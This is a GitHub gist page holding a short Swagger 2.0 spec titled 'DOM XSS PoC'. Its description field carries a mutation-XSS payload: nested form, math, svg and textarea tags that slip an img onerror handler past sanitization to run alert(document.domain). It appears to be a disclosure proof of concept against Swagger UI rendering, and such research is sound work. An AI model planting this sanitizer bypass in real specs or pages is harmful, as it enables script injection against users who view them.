Skip to content

Instantly share code, notes, and snippets.

@joelczk
Created March 18, 2023 13:04
Show Gist options
  • Save joelczk/f43ebff08688d22e99e69d7d14639310 to your computer and use it in GitHub Desktop.
Save joelczk/f43ebff08688d22e99e69d7d14639310 to your computer and use it in GitHub Desktop.
swagger: '2.0'
info:
version: "0.0.1"
title: DOM XSS PoC
description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form>
paths:
/:
get:
responses:
200:
description: Success
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment